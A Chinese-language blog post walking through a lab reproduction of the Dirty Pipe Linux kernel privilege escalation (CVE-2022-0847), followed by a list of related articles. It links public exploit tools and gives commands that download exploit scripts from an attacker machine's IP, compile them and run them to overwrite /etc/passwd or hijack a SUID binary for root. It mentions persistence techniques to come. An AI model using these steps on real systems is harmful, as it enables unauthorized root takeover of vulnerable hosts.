Linxu脏管道提权(CVE-2022-0847)

最新推荐文章于 2024-05-11 23:44:42 发布
最新推荐文章于 2024-05-11 23:44:42 发布
阅读量214 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: linux 网络安全 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oiadkt/article/details/129317995
版权

Abstract

This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.

It is similar to CVE-2016-5195 "Dirty. Cow" but is easier to exploit.

The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.

漏洞影响版本:5.8 <= Linux内核版本 < 5.16.11 / 5.15.25 / 5.10.102。该漏洞已在 Linux 5.16.11、5.15.25 和 5.10.102 中修复,同时不影响 5.17-rc6 之后的 Linux 内核版本。

环境准备:

        一套centos主机(注意影响版本),一套kali攻击机

kali下载两款工具:

  • https://github.com/imfiver/CVE-2022-0847利用覆写/etc/passwd 来提权
  • https://haxx.in/files/dirtypipez.c利用 覆盖SUID程序来提权

 centos环境准备

  • 使用rpm包安装5.10.48版本的内核yum localinstall kernel-* --skip-broken安装所有依赖包

  • 然后查看启动顺序:awk -F\' '$1=="menuentry " {print $2}' /etc/grub2.cfg,并将5.10的内核设为第一位

 

  • 然后重启看看系统内核信息是否正确,这边没问题,环境准备完成

漏洞利用一:覆写/etc/passwd 来提权

  • centos中使用普通用户登录,使用下面命令,进行下载覆写/etc/passwd进行提权
wget -c http://192.168.217.142:8000/Dirty-Pipe.sh
  • 下载完成后使用 chmod 给与 Dirty-Pipe.sh 可以执行权限,随后运行进行提权

 漏洞利用二:覆盖SUID程序来提权

  • 继续下载漏洞利用脚本
wget -c http://192.168.217.142:8000/dirtypipez.c

  • 使用 gcc dirtypipez.c -o exp 进行编译,但是在编译时出现问题,如果没有gcc环境先下载
gcc dirtypipez.c -o exp

  • 解决完后,再次编译,查找 SUID 程序,然后./运行,拿下root权限
gcc -g -std=c99 -o dirtypipez dirtypipez.c

  • Linux维权之后再发出来
kukuromi
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-0847(管道提权内核漏洞)
墨痕诉清风的博客
06-22 4250
摘要 CVE-2022-0847它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。它类似于 Dirty COW (CVE-2016-5195),但更容易被利用。内核影响版本:5.8 ...............
大白话图解 Linux 管道(Dirty Pipe) 漏洞(CVE-2022-0847)
omgFuture的博客
03-08 9700
大白话图解 Linux 管道(Dirty Pipe) 漏洞(CVE-2022-0847) 漏洞披露链接:https://dirtypipe.cm4all.com/ 背景 ​ 今天(2022年3月8日),开源社区爆出了Linux内核新的一级安全漏洞, Dirty Pipe Vulnerability. 漏洞点于Linux内核5.8版本引入,可以’通杀’后续多个版本内核,以及所有使用了相关Linux内核的下游厂商产品。当然,有必要说明的是,这里的通杀不是针对任意系统的远程命令执行,而是面向内
Linux管道提权
qq_43381463的博客
02-25 737
漏洞复现-DirtyPipe提权(CVE-2022-0847)
DirtyPipe(管道)提权
weixin_45794666的博客
03-08 6817
DirtyPipe提权 CVE-2022-0847 漏洞详情 新管道缓冲区结构的“flags”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧的值。非特权本地用户可通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Di
CVE-2022-0847【dirtypipez】管道提权复现
three_1996的博客
03-20 822
2022年3月7日,安全研究员Max提出一个Linux内核提权漏洞CVE-2022-0847,利用该漏洞,攻击者能够实现低权限用户提升至root权限,且完成主机任意可读文件的读写。该漏洞在原理上与先前出现的“DirtyCow”提权漏洞类似,且本质上是由于Kernel内核中编写的匿名管道限制不严的问题,所以将其命名为“DirtyPipe”。
CVE-2022-0847Linux内核提权漏洞
qq_49091880的博客
04-12 4545
步骤有点简略,各位师傅见谅
linux提权CVE-2022-0847
liu_jia_liang的博客
03-14 6864
0x01 漏洞详情 3月7日,研究人员公开披露了Linux 内核中的一个权限提升漏洞(CVE-2022-0847,也称为“Dirty Pipe”),允许非特权用户注入和覆盖任意只读文件中的数据,导致权限提升,并最终获得root权限。该漏洞影响了 Linux Kernel 5.8 及更高版本,甚至影响了Android设备。 CVE-2022-0847漏洞类似于 2016 年修复的 Dirty COW 漏洞 (CVE-2016-5195),但它更容易被利用,目前此漏洞的PoC/EXP已经发布。 0x0
新版Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2022-0847 Linux管道漏洞分析
qq_42735101的博客
01-26 955
CVE-2022-0847漏洞被一名叫Max Kellermann的安全研究员于2022年3月7日公开披露,并将该漏洞命名为The Dirty Pipe Vulnerability(管道漏洞)。
Linux提权CVE-2022-0847分析
HBohan的博客
03-25 2361
漏洞利用原理: 通过pipe生成一个管道,然后使用write调用pip_write将管道填满flag为PIPE_BUF_FLAG_CAN_MERGE,然后用read将缓冲区全部释放,但是根据splice进行零拷贝时copy_page_to_iter_pipe没有将flag初始化,导致缓冲区仍然留存PIPE_BUF_FLAG_CAN_MERGE。进而在write上检测flag存在PIPE_BUF_FLAG_CAN_MERGE来达成越权写入操作。 什么是零拷贝? 零拷贝是作用于两个文件间移动,正常文件拷贝流程一
Linux提权--内核漏洞--web用户提权(牛)&本地提权(管道)
最新发布
金灰的博客
05-11 599
免责声明:本文仅做技术交流与学习...
Linux内核提权漏洞(Dirty-pipe)复现
qq_69775412的博客
07-25 620
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
堪比“牛”!“管道” 漏洞可获得Linux 所有主流发行版本的root权限
smellycat000的专栏
03-08 675
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
CVE-2022-0847 Linux内核提权漏洞分析
道阻且长,行则将至。
04-06 5501
文章目录前言漏洞复现1.1 文件覆写poc/exp1.2 覆写/etc/passwd漏洞分析2.1 Linux管道机制2.2 splice系统调用2.3 漏洞利用流程总结 前言 2022年2月23日,Linux 内核发布漏洞补丁,修复了内核 5.8 及之后版本存在的任意文件覆盖的漏洞 (CVE-2022-0847),该漏洞可导致普通用户本地提权至 root 特权,因为与之前出现的 DirtyCow “牛”漏洞 (CVE-2016-5195) 原理类似,该漏洞被命名为 DirtyPipe。 在3月7日,漏洞
Dirty Pipe管道提权漏洞复现(CVE-2022-0847)
小千安全
05-06 847
攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root这个漏洞作者将其命名为了 Dirty Pipe(管道),一看到这名字讲道理就让人想到了 Dirty Cow(牛),这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。
Linux-dirty pipe内核提权漏洞复现-编号:CVE-2022-0847
08-31 1343
此漏洞属于Linux提权漏洞, 攻击者可利用该漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限,非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(提权),很多人应该了解并且能利用该漏洞。...
Linux内核提权漏洞(Dirty-pipe)复现_linux提权漏洞
dzqxwzoe的博客
12-06 720
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
如何修复linux漏洞 CVE-2022-0847
07-15
要修复Linux漏洞CVE-2022-0847,您可以按照以下步骤进行操作: 1. 更新系统:确保您的系统已经更新到最新的软件包版本。使用以下命令更新软件包: ``` sudo apt update sudo apt upgrade ``` 2. 安装补丁:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值